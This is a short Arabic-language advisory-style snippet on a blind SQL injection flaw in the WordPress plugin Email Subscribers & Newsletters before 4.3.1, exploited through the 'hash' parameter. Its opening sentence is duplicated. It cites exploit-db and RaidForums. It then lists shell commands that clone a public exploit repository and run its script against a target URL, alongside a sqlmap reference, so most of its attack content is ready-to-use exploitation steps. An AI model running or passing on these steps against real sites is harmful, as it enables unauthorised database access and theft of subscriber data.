
كان هناك ثغرة في إضافة WordPress، Email Subscribers & Newsletters قبل الإصدار 4.3.1، سمحت بتمرير عبارات SQL إلى قاعدة البيانات في معامل hash (ثغرة حقن SQL أعمى).
كان هناك ثغرة في إضافة ووردبريس، Email Subscribers & Newsletters قبل الإصدار 4.3.1، سمحت بتمرير عبارات SQL إلى قاعدة البيانات في معامل hash (ثغرة حقن SQL عمياء). هذا النص هو "نسخة منقحة" من النص الأصلي المتاح على exploit-db.com والمُنشأ بواسطة @KBA@SOGETI_ESEC ، وقد تم تنقيح النسخة الأصلية على RaidForums.com

> $ git clone https://github.com/jerrylewis9/CVE-2019-20361-EXPLOIT.git
> $ cd CVE-2019-20361-EXPLOIT
> $ chmod +x noodles.sh
> $ bash noodles.sh "url"
sqlmap (https://github.com/sqlmapproject/sqlmap)